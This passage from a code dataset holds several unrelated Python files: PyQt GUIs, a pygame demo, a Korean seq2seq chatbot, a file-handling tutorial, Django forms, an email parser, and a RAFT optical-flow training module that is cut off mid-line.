plt.savefig('Hist.png', bbox_inches=\"tight\", transparent=True, dpi=100)\n# pix = QPixmap(\"Hist.png\")\n# self.ui.label.setPixmap(pix)\n# self.ui.label_2.setPixmap(pix)\n# self.ui.label_3.setPixmap(pix)\n\n\n\n# 打开图片\n def open_file(self):\n fname = QFileDialog.getOpenFileName(None, '打开文件', './', (\"Images (*.png *.xpm *.jpg)\"))\n if fname[0]:\n img_cv = cv2.imdecode(np.fromfile(fname[0], dtype=np.uint8), -1) # 注意这里读取的是RGB空间的\n self.raw_image = img_cv\n self.last_image = img_cv\n self.current_img = img_cv\n self.show_image()\n self.imgskin = np.zeros(self.raw_image.shape)\n\n# # 恢复图片\n# def recover_img(self):\n# self.current_img = self.raw_image\n# self.show_image()\n# self.show_histogram()\n# self.intial_value()\n#\n# # 饱和度\n# def change_saturation(self):\n# if self.raw_image is None:\n# return 
0\n#\n# value = self.ui.horizontalSlider.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 2:\n# img_hsv[:, :, 2] = np.log(img_hsv[:, :, 2] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 2] = np.uint8(img_hsv[:, :, 2] / np.log(- value + np.e))\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 明度调节\n# def change_darker(self):\n# if self.raw_image is None:\n# return 0\n# value = self.ui.horizontalSlider_4.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 3:\n# img_hsv[:, :, 1] = np.log(img_hsv[:, :, 1] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 1] = np.uint8(img_hsv[:, :, 1] / np.log(- value + np.e))\n# self.last_image = self.current_img\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 人脸识别\n def detect_face(self):\n img = self.raw_image\n face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n return faces\nclass CARscene(QtWidgets.QGraphicsScene):\n def __init__(self, parent=None):\n super(CARscene, self).__init__(parent)\n def mousePressEvent(self, QMouseEvent):\n print(\"??\")\n #这行代码是期望显示坐标,奈何永远都是[0.0, 0.0]\n print(QMouseEvent.globalPos())\n\nif __name__ == \"__main__\":\n MainWindow()\n","sub_path":"src/com.ce/img-test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117376912","text":"import pygame\n\nsize = width, height = 400, 300\nscreen = pygame.display.set_mode(size)\nclock = pygame.time.Clock()\n\nrunning = True\nx1, y1 = 0, 0\ndrawing = False # режим рисования выключен\nr = 0\nv = 10\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n drawing = True\n screen.fill(pygame.Color('blue'))\n x1, y1 = event.pos\n r = 0\n pygame.draw.circle(screen, (255, 255, 0), event.pos, int(r))\n if drawing:\n pygame.draw.circle(screen, (255, 255, 0), (x1, y1), int(r))\n pygame.display.flip()\n r += v * clock.tick() / 1000\n screen.fill(pygame.Color('blue'))\npygame.quit()","sub_path":"PyGame2/Yellow_ball.py","file_name":"Yellow_ball.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525807433","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom user import Ui_USER\nfrom admin import Ui_Dialog1\nclass Ui_main(object):\n def openwindow(self,event):\n self.window= QtWidgets.QDialog()\n self.ui=Ui_USER()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def openwindowadmin(self,event):\n self.window = QtWidgets.QDialog()\n self.ui=Ui_Dialog1()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def setupUi(self, main):\n main.setObjectName(\"main\")\n main.setWindowModality(QtCore.Qt.NonModal)\n main.setEnabled(True)\n main.resize(1188, 631)\n main.setMinimumSize(QtCore.QSize(1188, 631))\n main.setMaximumSize(QtCore.QSize(1188, 631))\n font = QtGui.QFont()\n font.setBold(True)\n font.setItalic(True)\n font.setWeight(75)\n main.setFont(font)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"E:/project/icon.jpg\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n main.setWindowIcon(icon)\n main.setWindowOpacity(1.0)\n 
main.setStyleSheet(\"background-image: url(:/newPrefix/imageedit_8_7961532127.jpg);\")\n main.setSizeGripEnabled(False)\n main.setModal(False)\n self.label = QtWidgets.QLabel(main)\n self.label.setGeometry(QtCore.QRect(170, 490, 171, 41))\n self.label.setStyleSheet(\"background: transparent;\\n\"\n\"font: 75 12pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(85, 0, 127);\")\n self.label.setObjectName(\"label\")\n self.label.mousePressEvent=self.openwindowadmin\n self.label_2 = QtWidgets.QLabel(main)\n self.label_2.setGeometry(QtCore.QRect(360, 410, 131, 31))\n self.label_2.setStyleSheet(\"background:transparent;\\n\"\n\"font: 14pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(0, 0, 127)\")\n self.label_2.setObjectName(\"label_2\")\n self.label_2.mousePressEvent = self.openwindow\n\n self.retranslateUi(main)\n QtCore.QMetaObject.connectSlotsByName(main)\n\n def retranslateUi(self, main):\n _translate = QtCore.QCoreApplication.translate\n main.setWindowTitle(_translate(\"main\", \"QWIKLY\"))\n self.label.setText(_translate(\"main\", \"ADMINISTRATOR\"))\n self.label_2.setText(_translate(\"main\", \" USER\"))\nimport xx_rc\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n main = QtWidgets.QDialog()\n ui = Ui_main()\n ui.setupUi(main)\n main.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"601207099","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers, losses, metrics\nfrom tensorflow.keras import preprocessing\n\nimport numpy as np\nimport pandas as pd\n\nimport os\nimport re\nimport pickle\n\nfrom konlpy.tag import Okt\n\nclass seq2seq:\n def __init__(self):\n # 태그 단어\n self.PAD = \"\" # 패딩\n self.STA = \"\" # 시작\n self.END = \"\" # 끝\n self.OOV = \"\" # 없는 단어(Out of Vocabulary)\n\n # 태그 인덱스\n self.PAD_INDEX = 0\n self.STA_INDEX = 1\n self.END_INDEX = 2\n self.OOV_INDEX = 3\n\n # 데이터 타입\n self.ENCODER_INPUT = 0\n self.DECODER_INPUT = 1\n self.DECODER_TARGET = 2\n\n # 한 문장에서 단어 시퀀스의 최대 개수\n self.max_sequences = 30\n\n # 임베딩 벡터 차원\n self.embedding_dim = 100\n\n # LSTM 히든레이어 차원\n self.lstm_hidden_dim = 128\n\n # 정규 표현식 필터\n self.RE_FILTER = re.compile(\"[.,!?\\\"':;~()]\")\n\n #학습시 생성한 word_index vocab호출\n with open('./seq2seq/vocab_dict/index_to_word_final.pickle', 'rb') as f:\n self.index_to_word = pickle.load(f)\n\n with open('./seq2seq/vocab_dict/word_to_index_final.pickle', 'rb') as f:\n self.word_to_index = pickle.load(f)\n \n #--------------------------------------------\n # 훈련 모델 인코더 정의\n #--------------------------------------------\n # 입력 문장의 인덱스 시퀀스를 입력���로 받음\n encoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n encoder_outputs = layers.Embedding(len(self.index_to_word), self.embedding_dim)(encoder_inputs)\n # return_state가 True면 상태값 리턴\n # LSTM은 state_h(hidden state)와 state_c(cell state) 2개의 상태 존재\n encoder_outputs, state_h, state_c = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True)(encoder_outputs)\n # 히든 상태와 셀 상태를 하나로 묶음\n encoder_states = [state_h, state_c]\n #--------------------------------------------\n # 훈련 모델 디코더 정의\n #--------------------------------------------\n # 목표 문장의 인덱스 시퀀스를 입력으로 받음\n decoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n decoder_embedding = 
layers.Embedding(len(self.index_to_word), self.embedding_dim)\n decoder_outputs = decoder_embedding(decoder_inputs)\n # 인코더와 달리 return_sequences를 True로 설정하여 모든 타임 스텝 출력값 리턴\n # 모든 타임 스텝의 출력값들을 다음 레이어의 Dense()로 처리하기 위함\n decoder_lstm = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True,\n return_sequences=True)\n\n # initial_state를 인코더의 상태로 초기화\n decoder_outputs, _, _ = decoder_lstm(decoder_outputs,\n initial_state=encoder_states)\n\n # 단어의 개수만큼 노드의 개수를 설정하여 원핫 형식으로 각 단어 인덱스를 출력\n decoder_dense = layers.Dense(len(self.index_to_word), activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n\n\n\n #--------------------------------------------\n # 훈련 모델 정의\n #--------------------------------------------\n\n # 입력과 출력으로 함수형 API 모델 생성\n model = models.Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n # 학습 방법 설정\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n #--------------------------------------------\n # 예측 모델 인코더 정의\n #--------------------------------------------\n\n # 훈련 모델의 인코더 상태를 사용하여 예측 모델 인코더 설정\n encoder_model = models.Model(encoder_inputs, encoder_states)\n\n\n\n #--------------------------------------------\n # 예측 모델 디코더 정의\n #--------------------------------------------\n\n # 예측시에는 훈련시와 달리 타임 스텝을 한 단계씩 수행\n # 매번 이전 디코더 상태를 입력으로 받아서 새로 설정\n decoder_state_input_h = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_state_input_c = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c] \n\n # 임베딩 레이어\n decoder_outputs = decoder_embedding(decoder_inputs)\n\n # LSTM 레이어\n decoder_outputs, state_h, state_c = decoder_lstm(decoder_outputs,\n initial_state=decoder_states_inputs)\n\n # 히든 상태와 셀 상태를 하나로 묶음\n decoder_states = [state_h, state_c]\n\n # Dense 레이어를 통해 원핫 형식으로 각 단어 인덱스를 출력\n decoder_outputs = decoder_dense(decoder_outputs)\n\n # 예측 모델 디코더 설정\n decoder_model = models.Model([decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states)\n \n self.model = model\n self.encoder_model = encoder_model\n self.decoder_model = decoder_model\n\n #가중치 불러오기\n self.model.load_weights('./seq2seq/seq2seq_model/seq2seq2_model_weights')\n self.encoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_encoder_model_weights')\n self.decoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_decoder_model_weights')\n print(self.model.summary())\n \n # 형태소분석 함수\n def pos_tag(self, sentences):\n \n # KoNLPy 형태소분석기 설정\n tagger = Okt()\n \n # 문장 품사 변수 초기화\n sentences_pos = []\n \n # 모든 문장 반복\n for sentence in sentences:\n # 특수기호 제거\n sentence = re.sub(self.RE_FILTER, \"\", sentence)\n #print(sentence)\n # 배열인 형태소분석의 출력을 띄어쓰기로 구분하여 붙임\n sentence = \" \".join(tagger.morphs(sentence))\n sentences_pos.append(sentence)\n \n return sentences_pos\n\n def make_predict_input(self, sentence):\n\n sentences = []\n sentences.append(sentence)\n sentences = self.pos_tag(sentences)\n input_seq = self.convert_text_to_index(sentences, self.word_to_index, self.ENCODER_INPUT)\n \n return input_seq\n\n # 인덱스를 문장으로 변환\n def convert_index_to_text(self, indexs, vocabulary): \n \n sentence = ''\n \n # 모든 문장에 대해서 반복\n for index in indexs:\n if index == self.END_INDEX:\n # 종료 인덱스면 중지\n break;\n if vocabulary.get(index) is not None:\n # 사전에 있는 인덱스면 해당 단어를 추가\n sentence += vocabulary[index]\n else:\n # 사전에 없는 인덱스면 OOV 단어를 추가\n sentence.extend([vocabulary[self.OOV_INDEX]])\n \n # 빈칸 추가\n sentence += ' '\n\n return sentence\n\n \n 
\n    \n    # convert sentences into index sequences\n    def convert_text_to_index(self, sentences, vocabulary, type): \n        \n        sentences_index = []\n        \n        # iterate over all sentences\n        for sentence in sentences:\n            sentence_index = []\n            \n            # for decoder input, prepend the START tag\n            if type == self.DECODER_INPUT:\n                sentence_index.extend([vocabulary[self.STA]])\n            \n            # split the sentence into words on whitespace\n            for word in sentence.split():\n                if vocabulary.get(word) is not None:\n                    # word found in the vocabulary: append its index\n                    sentence_index.extend([vocabulary[word]])\n                else:\n                    # word not in the vocabulary: append the OOV index\n                    sentence_index.extend([vocabulary[self.OOV]])\n\n            # enforce the maximum length\n            if type == self.DECODER_TARGET:\n                # for decoder targets, append the END tag at the back\n                if len(sentence_index) >= self.max_sequences:\n                    sentence_index = sentence_index[:self.max_sequences-1] + [vocabulary[self.END]]\n                else:\n                    sentence_index += [vocabulary[self.END]]\n            else:\n                if len(sentence_index) > self.max_sequences:\n                    sentence_index = sentence_index[:self.max_sequences]\n            \n            # fill the remaining slots up to the maximum length with the PAD index\n            sentence_index += (self.max_sequences - len(sentence_index)) * [vocabulary[self.PAD]]\n            \n            # append this sentence's index array\n            sentences_index.append(sentence_index)\n\n        return np.asarray(sentences_index)\n\n\n    # text generation\n    def generate_text(self, input_seq):\n        \n        # run the input through the encoder to obtain its final states\n        states = self.encoder_model.predict(input_seq)\n\n        # initialize the target sequence\n        target_seq = np.zeros((1, 1))\n        \n        # put the START tag into the first slot of the target sequence\n        target_seq[0, 0] = self.STA_INDEX\n        \n        # initialize the index list\n        indexs = []\n        \n        # loop over the decoder time steps\n        while True:\n            # get the current time-step output from the decoder,\n            # initialized from the encoder states first, then from the previous decoder states\n            decoder_outputs, state_h, state_c = self.decoder_model.predict(\n                    [target_seq] + states)\n\n            # convert the one-hot-encoded result into an index\n            index = np.argmax(decoder_outputs[0, 0, :])\n            indexs.append(index)\n            \n            # check for termination\n            if index == self.END_INDEX or len(indexs) >= self.max_sequences:\n                break\n\n            # set the target sequence to the output just produced\n            target_seq = np.zeros((1, 1))\n            target_seq[0, 0] = index\n            \n            # feed the previous decoder states into the next prediction\n            states = [state_h, state_c]\n\n        # convert the indices into a sentence\n        sentence = self.convert_index_to_text(indexs, self.index_to_word)\n        to_matching = sentence.split(' ')\n        to_matching = to_matching[:-1]\n        chatbot_data = pd.read_csv('./seq2seq/ChatbotData_Cindy.csv', encoding='utf-8')\n        try:\n            for_matching = list(chatbot_data[chatbot_data.A.apply(lambda sentence1: all(word in sentence1 for word in to_matching))]['A'])\n            return_sentence = for_matching[0]\n        except IndexError:\n            return_sentence = sentence\n        return return_sentence\n        \n\n    def get_answer(self, text):\n        input_seq = self.make_predict_input(text)\n        return self.generate_text(input_seq)\n\n    \n\n\n\n\n","sub_path":"Cindy_project/seq2seq/Seq2Seq_model_class.py","file_name":"Seq2Seq_model_class.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"403456200","text":"#!/usr/bin/env python\n\"\"\"\nSteps for reading and writing a file:\n    1. open the file\n    2. read / write\n    3. close the file\nUTF-8 encoding:\nIt is recommended to save files on disk uniformly as UTF-8\nand to work with text in memory uniformly as Unicode.\n\"\"\"\nimport pickle\n\ndef 从文件中读数据():\n    fp = open(\"names.txt\", \"rb\")\n    #print(fp.read())\n    content = fp.readlines()\n    fp.seek(0)\n    content2 = fp.readlines()\n    print(content)\n    print(content2)\n    for i in content:\n        print(i.decode(\"utf-8\").strip())\n    fp.close()\n\n\ndef 把数据写入到文件():\n    fp = open(\"地址.txt\", \"wb\")\n    address = [\"中国\", \"非洲\", \"朝鲜\"]\n    for i in address:\n        #fp.write(i.encode(\"utf-8\")+ b'\\n')\n        fp.write(\"{}\\n\".format(i).encode(\"utf-8\"))\n    fp.close()\n\n\ndef write_pickle():\n    dict1 = {\"name\": \"sam\", \"age\": 16}\n    # fp = open(\"tmp_pickle\", 'wb')\n    # pickle.dump(dict1, fp)\n    # fp.close()
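Right at this point the module contrasts the manual open/dump/close pattern with a context-manager version; a self-contained round-trip (hypothetical temp-file path) shows the advantage — the file handle is closed even if pickle.dump raises:

```python
import os
import pickle
import tempfile

record = {"name": "sam", "age": 16}
path = os.path.join(tempfile.gettempdir(), "tmp_pickle_demo")  # illustrative path

# write: the handle is closed when the with-block exits, even on an exception
with open(path, "wb") as fp:
    pickle.dump(record, fp, protocol=pickle.HIGHEST_PROTOCOL)

# read back and verify the round-trip
with open(path, "rb") as fp:
    assert pickle.load(fp) == record
```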
\n\n    # advantage: the with context manager closes the opened file automatically\n    with open(\"tmp_pickle\", 'wb') as fp:\n        pickle.dump(dict1, fp)\n\n\ndef read_pickle():\n    fp = open(\"tmp_pickle\", 'rb')\n    dict1 = pickle.load(fp)\n    print(dict1)\n    fp.close()\n\n\nif __name__ == \"__main__\":\n    从文件中读数据()\n    #把数据写入到文件()\n    #write_pickle()\n    #read_pickle()","sub_path":"read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"302956747","text":"from django import forms\nfrom django.forms.widgets import CheckboxInput\nfrom .models import Project, Task\n\n\nclass NewTaskForm(forms.ModelForm):\n    # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n    class Meta:\n        model = Task\n        fields = [\"task_title\", \"task_content\"]\n    \n\n\n\nclass NewProjectForm(forms.ModelForm):\n    # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n    class Meta:\n        model = Project\n        fields = [\"project_title\"]\n    class Media:\n        js = ('ckeditor/ckeditor.js',) # The , at the end of this list IS important.\n        css = {\n            'all': ('ckeditor/contents.css',)\n        }\n","sub_path":"todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"96065825","text":"from handler import BaseCommand, Context, Arguments, CommandResult\n\nfrom rpg.player import Player, UnknownPlayer\nfrom utils.formatting import codeblock\n\n\nclass Command(BaseCommand):\n    async def run(self, ctx: Context, args: Arguments) -> CommandResult:\n        try:\n            player = await Player.from_id(ctx.author.id, ctx.bot.pg)\n        except UnknownPlayer:\n            return \"У вас нет персонажа\"\n\n        if player.inventory.size:\n            inventory = \"\\n\".join(str(i) for i in player.inventory)\n        else:\n            inventory = \"Ваш инвентарь пуст\"\n\n        equipment_item_map = [\n            (slot, getattr(player.equipment, slot))\n            for slot in player.equipment._slots\n        ]\n\n        equipment = \"\\n\".join(\n            f\"{slot:>10}: {item}\" for (slot, item) in equipment_item_map\n        )\n\n        return codeblock(\n            f\"Экипировка:\\n\\n{equipment}\\n\\nИнвентарь:\\n\\n{inventory}\"\n        )\n","sub_path":"tarakania_rpg/commands/rpg/inventory/command_inventory.py","file_name":"command_inventory.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"626775693","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom translate import Translate\n\nclass Email:\n    def __init__(self, name, booking_no, errand, msg):\n        self.sender = name\n        self.booking_no = booking_no\n        self.errand = errand\n        self.msg = msg\n\nclass EmailParser:\n    def __init__(self, max_length=0):\n        self.MAX_MESSAGE_LENGTH = max_length\n\n    def set_message_max_length(self, max_length):\n        self.MAX_MESSAGE_LENGTH = max_length\n\n    def parse_inbox(self, inbox, qty):\n        emails = []\n        count = 0\n        invalid = 0\n        while count < qty:\n            try:\n                count += 1\n                item = next(inbox).body\n                email = self.__parse_email(item)\n                if email:\n                    emails.append(email)\n            except Exception as e:\n                invalid += 1\n                print('EMAIL UNREADABLE', e)\n        print('{} / {} emails parsed.'.format(qty - invalid, qty))\n        return emails\n\n    def __clean_html(self, html_object):\n        if html_object is not None:\n            return re.sub('<[^<]+?>', '', html_object)\n\n    def __get_element(self, table, row):\n        return str(table.findAll('table')[row].findAll('tr')[0])\n\n    def __has_booking_no(self, table):\n        
return 'Ev bokningsnummer' in self.__get_element(table, 2)\n\n def __parse_email(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n table = soup.findAll('table')[0]\n name = self.__get_element(table, 1)\n booking_no = self.__get_element(table, 3) if self.__has_booking_no(table) else '~None~'\n errand = self.__get_element(table, 5) if self.__has_booking_no(table) else self.__get_element(table, 3)\n msg = self.__get_element(table, 7) if self.__has_booking_no(table) else self.__get_element(table, 5)\n\n if len(str(msg)) <= self.MAX_MESSAGE_LENGTH or self.MAX_MESSAGE_LENGTH == 0:\n return Email(\n self.__clean_html(name)[1:][:-1],\n self.__clean_html(booking_no)[1:][:-1],\n self.__clean_html(errand)[1:][:-1],\n self.__clean_html(msg)[1:][:-1]\n )\n","sub_path":"src/email_parser.py","file_name":"email_parser.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"586602652","text":"# STD\nimport os\nimport shutil\nfrom pathlib import Path\n\n# MISC\nimport numpy as np\nimport shutil\n\n# DL-framework\nimport torch\nimport torch.optim.lr_scheduler\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torchvision import transforms\nfrom torchvision.utils import make_grid\nfrom torch import from_numpy as fn\n\n# MODULES\n\nfrom src.common.utils import DotDict\nfrom raft import RAFT\nfrom src.common.visu import Visualizer\nfrom pose_estimation import full_pose_estimation\n\nfrom src.segmentation.fast_scnn import FastSCNN\nfrom src.common.rotations import so3_relative_angle\n\n\n__all__ = [\"Network\"]\n\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n\n\ndef sequence_loss(flow_preds, flow_gt, valid, synthetic, gamma=0.8, max_flow=MAX_FLOW):\n \"\"\"Loss function defined over sequence of flow predictions\"\"\"\n\n n_predictions = len(flow_preds)\n flow_loss = 0.0\n\n # exlude invalid pixels and extremely large diplacements\n mag = torch.sum(flow_gt ** 2, dim=1).sqrt()\n valid = (valid >= 0.5) & (mag < max_flow)\n\n for i in range(n_predictions):\n i_weight = gamma ** (n_predictions - i - 1)\n i_loss = (flow_preds[i] - flow_gt).abs()\n flow_loss += i_weight * (valid[:, None] * i_loss).mean()\n\n epe = torch.sum((flow_preds[-1] - flow_gt) ** 2, dim=1).sqrt()\n epe2 = epe.clone()\n epe2 = epe2 * valid\n epe2 = epe2.sum(dim=(1, 2)) / valid.sum(dim=(1, 2))\n metrics = {}\n\n if synthetic.sum() > 0:\n metrics[\"epe_render\"] = epe2[synthetic].mean().item()\n non_synthetic = synthetic == False\n if non_synthetic.sum() > 0:\n metrics[\"epe_real\"] = epe2[non_synthetic].mean().item()\n\n epe = epe.view(-1)[valid.view(-1)]\n metrics[\"epe\"] = epe.mean().item()\n metrics[\"1px\"] = (epe < 1).float().mean().item()\n metrics[\"3px\"] = (epe < 3).float().mean().item()\n metrics[\"5px\"] = (epe < 5).float().mean().item()\n\n return flow_loss, metrics, epe2\n\n\nclass Network(LightningModule):\n def __init__(self, exp, env):\n super().__init__()\n self._exp = exp\n self._env = env\n self.hparams[\"lr\"] = self._exp[\"lr\"]\n\n self.model = RAFT(args=DotDict(self._exp[\"model\"][\"args\"]))\n\n self._mode = \"train\"\n self._logged_images = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n if \"logged_images_max\" in self._exp.keys():\n self._logged_images_max = self._exp[\"logged_images_max\"]\n else:\n self._logged_images_max = {\"train\": 2, \"val\": 2, \"test\": 2}\n\n 
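The gamma-weighted multi-iteration flow loss computed by sequence_loss above is easier to see on toy tensors; the shapes, noise scales, and gamma value here are illustrative only, not the training configuration:

```python
import torch

# toy setup: 3 RAFT-style refinement iterations, batch 2, 2-channel flow on a 4x4 grid
flow_gt = torch.randn(2, 2, 4, 4)
flow_preds = [flow_gt + s * torch.randn_like(flow_gt) for s in (0.5, 0.3, 0.1)]
valid = torch.ones(2, 4, 4)  # pretend every pixel is valid
gamma = 0.8                  # illustrative decay, like the gamma argument above

loss = torch.zeros(())
n = len(flow_preds)
for i, pred in enumerate(flow_preds):
    weight = gamma ** (n - i - 1)    # 0.64, 0.8, 1.0: later iterations weigh more
    l1 = (pred - flow_gt).abs()      # per-pixel L1 over both flow channels
    loss = loss + weight * (valid[:, None] * l1).mean()

print(float(loss))
```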
self._type = (\n torch.float16 if exp[\"trainer\"].get(\"precision\", 32) == 16 else torch.float32\n )\n self._visu = Visualizer(\n os.path.join(exp[\"name\"], \"visu\"), num_classes=2, store=False\n )\n\n if self._exp.get(\"mode\", \"train\") == \"test\":\n self._estimate_pose = True\n # SEGMENTATION\n self.seg = FastSCNN(**self._exp[\"seg\"][\"cfg\"])\n self.output_transform_seg = transforms.Compose(\n [\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n else:\n self._estimate_pose = False\n\n self._count_real = {\"train\": 0, \"val\": 0, \"test\": 0}\n self._count_render = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n shutil.rmtree(\"/home/jonfrey/tmp/ycb\", ignore_errors=True)\n\n def forward(self, batch, **kwargs):\n image1 = batch[0]\n image2 = batch[1]\n flow_predictions = self.model(image1, image2, iters=self._exp[\"model\"][\"iters\"])\n\n self.plot(batch[2], flow_predictions, image1, image2, batch[3])\n return flow_predictions\n\n def on_train_epoch_start(self):\n\n self._visu.logger = self.logger\n self._mode = \"train\"\n\n def on_train_start(self):\n pass\n\n def on_epoch_start(self):\n # RESET IMAGE COUNT\n for k in self._logged_images.keys():\n self._logged_images[k] = 0\n self._visu.epoch = self.trainer.current_epoch\n self.log(\"current_epoch\", self.trainer.current_epoch)\n self.log(\"gloabal_step\", self.trainer.global_step)\n\n def training_step(self, batch, batch_idx):\n \"\"\"\n img1 0-255 BS,C,H,W\n img2 0-255 BS,C,H,W\n flow BS,2,H,W max [-155 263]\n valid 0 or 1\n\n flow_predictons is a list len(flow_predictions) = iters , flow_predictions[0].shape == flow.shape\n \"\"\"\n self.log(\n \"learning_rate\", float(self.trainer.lr_schedulers[0][\"scheduler\"].get_lr()[0])\n )\n BS = batch[0].shape[0]\n flow = batch[2]\n valid = batch[3]\n synthetic = batch[4]\n flow_predictions = self(batch=batch)\n\n loss, metrics, epe_per_object = sequence_loss(\n flow_predictions, flow, valid, synthetic, self._exp[\"model\"][\"gamma\"]\n )\n\n if self._estimate_pose:\n # PRED FLOW\n inp = torch.cat(\n [\n self.output_transform_seg(batch[0] / 255.0),\n self.output_transform_seg(batch[1] / 255.0),\n ],\n dim=1,\n )\n outputs = self.seg(inp)\n probs = torch.nn.functional.softmax(outputs[0], dim=1)\n pred_valid = torch.argmax(probs, dim=1)\n acc = (pred_valid == valid).sum() / torch.numel(valid)\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n\n # ESTIMATE POSE\n (\n res_dict,\n count_invalid,\n h_pred__pred_pred,\n ratios,\n valid_res,\n ) = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=pred_valid.clone(),\n flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n try:\n self.count_suc += BS - count_invalid\n self.count_failed += count_invalid\n except:\n self.count_suc = BS - count_invalid\n self.count_failed = count_invalid\n\n self.log(f\"acc_mask\", acc.item(), on_step=True, on_epoch=True)\n\n index_key = str(int(idx))\n self.log(\n f\"inital_trans_error_obj\" + index_key,\n (torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3])).item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"inital_rotation_error_obj\" + index_key,\n (\n so3_relative_angle(\n h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n )\n / 
